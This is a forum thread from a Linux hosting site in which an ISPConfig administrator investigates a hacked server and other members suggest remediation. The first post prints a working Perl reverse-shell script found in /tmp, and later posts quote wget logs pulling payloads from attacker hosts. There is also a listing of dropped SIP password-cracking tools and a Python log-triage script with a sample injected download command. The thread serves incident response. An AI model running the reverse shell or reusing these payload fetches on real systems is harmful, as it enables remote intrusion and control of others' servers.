HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 3 > General

  #1  
Old 22nd September 2010, 01:09
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default Server Hacked

Noticed some issues with services down on my box and started looking through my logs. It appears that the machine has been hacked and I'm still trying to see if it is with a particular site or how they got in. I did find a file named back.txt that was just sitting in the /tmp directory.

Code:
#!/usr/bin/perl
use IO::Socket;
$system    = '/bin/bash';
$ARGC=@ARGV;
print "--== Fucking Machine ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Spawning Shell \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== Thuraya Team ==--  \n\n";
system("unset HISTFILE; unset SAVEFILE; unset HISTSAVE; history -n; unset WATCH; export HISTFILE=/dev/null ;echo --==Systeminfo==-- ; uname -a;echo;echo --==Uptime==--; w;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
I also see a lot of this in the logs

Code:
72.249.74.26 - - [20/Sep/2010:23:50:04 -0500] "GET /w00tw00t.at.blackhats.romanian.anti-sec:) HTTP/1.1" 404 364 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:14 -0500] "GET /db/scripts/setup.php HTTP/1.1" 404 343 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /myadmin/scripts/setup.php HTTP/1.1" 404 348 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysql/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /mysqladmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /typo3/phpmyadmin/scripts/setup.php HTTP/1.1" 404 357 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpadmin/scripts/setup.php HTTP/1.1" 404 349 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:17 -0500] "GET /phpMyAdmin/scripts/setup.php HTTP/1.1" 404 351 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /phpmyadmin2/scripts/setup.php HTTP/1.1" 404 352 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /pma/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:23 -0500] "GET /web/phpMyAdmin/scripts/setup.php HTTP/1.1" 404 355 "-" "ZmEu"
72.249.74.26 - - [20/Sep/2010:23:50:26 -0500] "GET /web/scripts/setup.php HTTP/1.1" 404 344 "-" "ZmEu"
This seems to be a pretty common attack while searching the internet, but something seems to have clearly got access based on the file in tmp.

Here is where I found the reference to back.txt; it looks like it was grabbed from FTP:

Code:
--10:18:55--  ftp://lifepark:*password*@61.220.169.154/.trash/robot.txt
           => `robot.txt'
Connecting to 61.220.169.154:21... connected.
Logging in as lifepark ... Logged in!
==> SYST ... done.    ==> PWD ... done.
==> TYPE I ... done.  ==> CWD /.trash ... done.
==> PASV ... done.    ==> RETR robot.txt ... done.

    0K .......... ......                                        25.11 KB/s

10:18:58 (25.11 KB/s) - `robot.txt' saved [17177]

kill: usage: kill [-s sigspec | -n signum | -sigspec] pid | jobspec ... or kill -l [sigspec]
join: missing operand
Try `join --help' for more information.
sh: http://mysql.gwshack.us/back.txt: No such file or directory
sh: http://mysql.gwshack.us/back.txt: No such file or directory
--10:32:13--  http://mysql.gwshack.us/back.txt
           => `back.txt'
Resolving mysql.gwshack.us... 213.251.132.191
Connecting to mysql.gwshack.us|213.251.132.191|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 892 [text/plain]

    0K                                                       100%  121.53 MB/s

10:32:14 (121.53 MB/s) - `back.txt' saved [892/892]
This is a debian4 box that is updated along with the latest ISPconfig updates. One site is running wordpress which is also updated so I'm not sure where the vulnerability is.

Any suggestions on which direction to move at this point to look for holes and clean things up?

Last edited by jcombs_31; 22nd September 2010 at 01:56.
  #2  
Old 22nd September 2010, 14:23
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,741 Times in 2,575 Posts
Default

First of all I'd run chkrootkit and rkhunter to see if there are any rootkits on your system. Then make sure that all your web applications (Wordpress, Joomla, etc.) are up to date.
  #3  
Old 22nd September 2010, 18:16
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,083
Thanks: 826
Thanked 5,396 Times in 4,240 Posts
Default

Which user is the owner of /tmp/back.txt file?
  #4  
Old 22nd September 2010, 23:59
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default

Found a lot of new files today in /tmp. The owner of all appears to be www-data

Code:
 ls -la
total 1400
drwxrwxrwt  8 root     root       4096 Sep 22 16:55 .
drwxr-xr-x 22 root     root       4096 Sep 21 21:08 ..
drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .ICE-unix
drwxrwxrwt  2 root     root       4096 Sep 21 21:08 .X11-unix
drwxr-xr-x  2 www-data www-data   4096 Sep 22 14:44 .session
drwxr-xr-x  6 www-data www-data   4096 Mar 26 08:48 .svn
-rwxr-xr-x  1 www-data www-data   4834 Mar 26 08:48 Changelog
-rwxr-xr-x  1 www-data www-data   1361 Mar 26 08:48 README
-rwxr-xr-x  1 www-data www-data    308 Mar 26 08:48 THANKS
-rwxr-xr-x  1 www-data www-data     80 Mar 26 08:48 TODO
-rwxr-xr-x  1 www-data www-data   2429 Sep 22 14:42 a
-rwxr-xr-x  1 www-data www-data  36898 Sep  2 04:27 bfp
-rwxr-xr-x  1 www-data www-data  20887 Sep  2 04:27 bfr
drwxr-xr-x  5 www-data www-data   4096 Sep  2 04:27 bfr-1.6
-rwxr-xr-x  1 www-data www-data   2010 Mar 26 09:18 crack
-rwxr-xr-x  1 www-data www-data  65431 Sep  5 13:17 dictionar
-rwxr-xr-x  1 www-data www-data     18 Sep  6 12:15 email
srwx------  1 root     root          0 Sep 21 21:09 fail2ban.sock
-rwxr-xr-x  1 www-data www-data  12175 Mar 26 08:48 fphelper.py
-rwxr-xr-x  1 www-data www-data  12288 Mar 26 08:48 groupdb
-rwxr-xr-x  1 www-data www-data  36772 Mar 26 08:48 helper.py
-rwxr-xr-x  1 www-data www-data  36024 Mar 26 08:48 helper.pyc
-rwxr-xr-x  1 www-data www-data   1833 Mar 26 09:18 install
-rwxr-xr-x  1 www-data www-data    143 Mar 26 08:48 kill
-rwxr-xr-x  1 www-data www-data    568 Mar 26 09:18 lib.sh
-rwxr-xr-x  1 www-data www-data   4298 Mar 26 08:48 pptable.py
-rwxr-xr-x  1 www-data www-data   4998 Mar 26 08:48 pptable.pyc
-rwxr-xr-x  1 www-data www-data   4229 Mar 26 08:48 regen.py
drwxr-xr-x  2 www-data www-data   4096 Mar 26 08:48 results
-rwxr-xr-x  1 www-data www-data   1509 Mar 26 09:18 scan
-rwxr-xr-x  1 www-data www-data 512766 Sep  6 14:17 sip.tgz
-rwxr-xr-x  1 www-data www-data 110592 Mar 26 08:48 staticfull
-rwxr-xr-x  1 www-data www-data 282624 Mar 26 08:48 staticheaders
-rwxr-xr-x  1 www-data www-data    749 Mar 26 08:48 sv.xsl
-rwxr-xr-x  1 www-data www-data  22222 Mar 26 08:48 svcrack.py
-rwxr-xr-x  1 www-data www-data   9159 Mar 26 08:48 svlearnfp.py
-rwxr-xr-x  1 www-data www-data  24601 Mar 26 08:48 svmap.py
-rwxr-xr-x  1 www-data www-data  12852 Mar 26 08:48 svreport.py
-rwxr-xr-x  1 www-data www-data  26016 Mar 26 08:48 svwar.py
-rwxr-xr-x  1 www-data www-data   6152 Sep  2 04:27 timeout
-rwxr-xr-x  1 www-data www-data   1619 Mar 26 08:48 timeout.c
-rwxr-xr-x  1 www-data www-data  45056 Mar 26 08:48 totag
Take a look at the readme

Code:
cat README
Welcome to SIPVicious security tools.

The 4 tools that you should be looking at are:
 - svmap
 - svwar
 - svcrack
 - svreport


The tools:
svmap - this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.

svwar - identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.

svcrack - a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.

svreport - able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.

svlearnfp - allows you to generate new fingerprints by simply running
the tool against a host. It will attempt to guess most values and allow
you to save the information to the local fingerprint db. Then you can
choose to upload it to the author so that it can be added to the database.

For usage help make use of -h or --help switch.

Also check out the wiki:
http://code.google.com/p/sipvicious/w/list

And if you're stuck you're welcome to contact the author.

Sandro Gauci
sandrogauc at gmail dot com
Rkhunter isn't finding anything. System is always up-to-date, wordpress is newest version and only running on 1 site with suexec.
  #5  
Old 23rd September 2010, 00:25
juan_g juan_g is offline
Junior Member
 
Join Date: Sep 2010
Posts: 19
Thanks: 7
Thanked 1 Time in 1 Post
Default Fail2ban

Was the Fail2ban intrusion prevention framework installed? It's one of the recommended steps for ISPConfig (see The Perfect Server, page 4, #16 Install fail2ban).

On ISPConfig 3:

Monitor -> Logfiles -> Show fail2ban-Log

Last edited by juan_g; 23rd September 2010 at 00:30.
  #6  
Old 23rd September 2010, 01:25
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
Default

Yes, fail2ban is installed.

Looks like this is coming from Japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

Code:
--14:41:25--  http://61.115.230.118/icons/sip.tgz
           => `sip.tgz'
Connecting to 61.115.230.118:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 512,766 (501K) [application/x-gzip]

    0K .......... .......... .......... .......... ..........  9%    8.68 KB/s
   50K .......... .......... .......... .......... .......... 19%    3.48 KB/s
  100K .......... .......... .......... .......... .......... 29%    7.66 KB/s
  150K .......... .......... .......... .......... .......... 39%    4.19 KB/s
  200K .......... .......... .......... .......... .......... 49%    5.63 KB/s
  250K .......... .......... .......... .......... .......... 59%    7.58 KB/s
  300K .......... .......... .......... .......... .......... 69%    7.43 KB/s
  350K .......... .......... .......... .......... .......... 79%    4.90 KB/s
  400K .......... .......... .......... .......... .......... 89%    8.46 KB/s
  450K .......... .......... .......... .......... .......... 99%   13.72 KB/s
  500K                                                       100%    1.31 MB/s

14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]
Code:
 whois 61.115.230.118
[ JPNIC database provides information regarding IP address and ASN. Its use   ]
[ is restricted to network administration purposes. For further information,  ]
[ use 'whois -h whois.nic.ad.jp help'. To only display English output,        ]
[ add '/e' at the end of command, e.g. 'whois -h whois.nic.ad.jp xxx/e'.      ]

Network Information:
a. [Network Number]             61.115.230.0/24
b. [Network Name]               AT-LINKNET
g. [Organization]               Link Incorporated
m. [Administrative Contact]     GO004JP
n. [Technical Contact]          YI1082JP
p. [Nameserver]                 dns1.atworks.co.jp
p. [Nameserver]                 ns02.idc.jp
p. [Nameserver]                 ns03.idc.jp
[Assigned Date]                 2001/04/12
[Return Date]
[Last Update]                   2005/04/14 18:59:04(JST)

Less Specific Info.
----------
Yahoo Japan Corporation
                     [Allocation]                              61.115.224.0/20

More Specific Info.
----------
No match!!
  #7  
Old 23rd September 2010, 08:28
matty matty is offline
Member
 
Join Date: Apr 2010
Location: Australia
Posts: 85
Thanks: 2
Thanked 12 Times in 11 Posts
Default

grep through your apache logs for words like wget, curl, tar, exec, perl, and so on. They will most likely be using a script vulnerability to download, unpack, and run the files. That should show up what is being exploited. Also manually scroll through the logs at around the time you see that those files were downloaded. That may also give you some hints.
  #8  
Old 23rd September 2010, 08:53
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,083
Thanks: 826
Thanked 5,396 Times in 4,240 Posts
Default

As the files are owned by www-data and rkhunter is not showing any problems, it might be that the hackers did not get root privileges yet. There have been a few vulnerabilities in phpmyadmin in the last months, and your log output shows that they searched for phpmyadmin, so it might be that they went in through phpmyadmin.

You wrote above that this is a debian 4 system. I recommend that you update it to debian 5. There is a howto from falko available here at howtoforge that describes the debian 4 to 5 update procedure. Before you update, remove phpmyadmin with:

apt-get remove --purge phpmyadmin

and reinstall it after the update with:

apt-get install phpmyadmin

You should also remove all these files in /tmp and then check your server over the next days to see if you notice any anomalous behaviour or higher load. You can also check your server with a portscanner from an external system to see if any ports are open that you don't want to be open.
  #9  
Old 25th September 2010, 20:37
e100 e100 is offline
Junior Member
 
Join Date: Sep 2010
Posts: 12
Thanks: 1
Thanked 5 Times in 1 Post
Default

Get time stamp of that entry in error log.
Then try to match the error to a request in the access log so you can see what page they exploited to make it download this sip.tgz.

Do the same thing with the file dates in /tmp
Match the creation times to requests in access log.


Quote:
Originally Posted by jcombs_31
Yes, fail2ban is installed.

Looks like this is coming from japan, or at least the server the files were downloaded from. In /var/log/apache2/error.log I see

Code:
--14:41:25--  http://61.115.230.118/icons/sip.tgz
           => `sip.tgz'
Connecting to 61.115.230.118:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 512,766 (501K) [application/x-gzip]


14:42:52 (6.22 KB/s) - `sip.tgz' saved [512766/512766]
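Putting matty's grep suggestion (post #7) and e100's timestamp matching (post #9) together, here is an added Python example, not code from the thread or from ISPConfig, that parses Apache combined-format access-log lines, flags requests carrying download/exec tokens or the ZmEu scanner markers seen in the first post, and pulls out every request within a short window of a pivot time such as the `--14:41:25--` stamp from error.log or the mtime of a dropped file in /tmp. The sample log lines, the 198.51.100.7 / 203.0.113.9 addresses, the `?cmd=` query and the two-minute window are constructed assumptions for the demonstration.

```python
"""Triage an Apache access log after a web-app compromise: flag requests that
carry download/exec tokens or known scanner markers, and pull the requests that
landed within a time window around a pivot (an error-log timestamp or the
mtime of a dropped file in /tmp). Example code, not part of the thread."""
import os
import re
from datetime import datetime, timedelta, timezone
from urllib.parse import unquote

# Apache "combined" log format: ip ident user [ts] "request" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Tokens a download-and-run stage tends to leave behind in a request.
EXEC_TOKENS = re.compile(r'\b(wget|curl|tar|perl|python|bash|chmod|exec|system)\b', re.I)
# Markers of the mass scanners quoted in the thread (user agent / probe path).
SCANNER_MARKERS = ("ZmEu", "w00tw00t", "/scripts/setup.php")

# Constructed sample lines (not from the poster's server): a ZmEu probe like the
# ones quoted in post #1, a hypothetical injected download command, ordinary
# traffic in the same minute, and unrelated traffic hours later.
SAMPLE_LOG = """\
72.249.74.26 - - [20/Sep/2010:23:50:08 -0500] "GET /admin/scripts/setup.php HTTP/1.1" 404 346 "-" "ZmEu"
198.51.100.7 - - [22/Sep/2010:14:41:24 -0500] "GET /index.php?cmd=cd%20/tmp;wget%20http://203.0.113.9/icons/sip.tgz HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.4 - - [22/Sep/2010:14:41:40 -0500] "GET /wp-login.php HTTP/1.1" 200 1234 "-" "Mozilla/5.0"
192.0.2.4 - - [22/Sep/2010:16:10:00 -0500] "GET /about/ HTTP/1.1" 200 4321 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    e = m.groupdict()
    e["when"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
    # Decode %xx escapes so "wget%20http" is inspected as "wget http".
    e["decoded_req"] = unquote(e["req"])
    return e


def flag_reasons(entry):
    """List why a request looks suspicious (empty list = nothing found)."""
    reasons = []
    hit = EXEC_TOKENS.search(entry["decoded_req"])
    if hit:
        reasons.append("exec-token:" + hit.group(1).lower())
    for marker in SCANNER_MARKERS:
        if marker in entry["ua"] or marker in entry["decoded_req"]:
            reasons.append("scanner:" + marker)
    return reasons


def pivot_from_error_log(hhmmss, day, tz):
    """wget's progress lines in error.log carry only a clock time (--14:41:25--);
    combine it with the day known from the file listing and the log's zone."""
    t = datetime.strptime(hhmmss, "%H:%M:%S").time()
    return datetime.combine(day, t, tzinfo=tz)


def pivot_from_mtime(path, tz):
    """Use the mtime of a dropped file (e.g. /tmp/sip.tgz) as the pivot instead."""
    return datetime.fromtimestamp(os.stat(path).st_mtime, tz)


def triage(log_text, pivots=(), window=timedelta(minutes=2)):
    """Return (entry, reasons) for every line that is flagged or that falls
    within `window` of any pivot; the reason for the latter names the pivot."""
    out = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if e is None:
            continue
        reasons = flag_reasons(e)
        for p in pivots:
            if abs(e["when"] - p) <= window:
                reasons.append("near:" + p.strftime("%H:%M:%S"))
        if reasons:
            out.append((e, reasons))
    return out


def triage_sample():
    """Run the triage over the constructed sample using the thread's error-log
    time (14:41:25 on 22 Sep, log zone -0500) as the pivot."""
    tz = timezone(timedelta(hours=-5))
    pivot = pivot_from_error_log("14:41:25", datetime(2010, 9, 22).date(), tz)
    return triage(SAMPLE_LOG, pivots=[pivot])


if __name__ == "__main__":
    for e, why in triage_sample():
        print(e["when"].strftime("%d/%b %H:%M:%S"), e["ip"], ", ".join(why), "->", e["req"][:70])
```

On a real box, read the log file instead of SAMPLE_LOG and pass several pivots at once (the error.log stamp plus `pivot_from_mtime` for each file in the `ls -la` listing); the "near:" hits that carry no exec token are the ones to read by hand, since the exploited request often looks innocuous until it is decoded.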
  #10  
Old 2nd October 2010, 18:33
jcombs_31 jcombs_31 is offline
Member
 
Join Date: Jan 2009
Location: South Florida
Posts: 83
Thanks: 2
Thanked 2 Times in 1 Post
 
Default

Things have been ok since deleting all files that were downloaded. I went ahead and did an upgrade from etch to lenny today. The only concern I have is that it doesn't look like the kernel was upgraded.

Code:
uname -r
2.6.18-128.1.1.el5.028stab062.3
Any downside to using an older kernel? Debian version shows as lenny

Code:
cat /etc/debian_version
5.0.6
I'm just a little nervous about trying to upgrade the kernel on a remote system.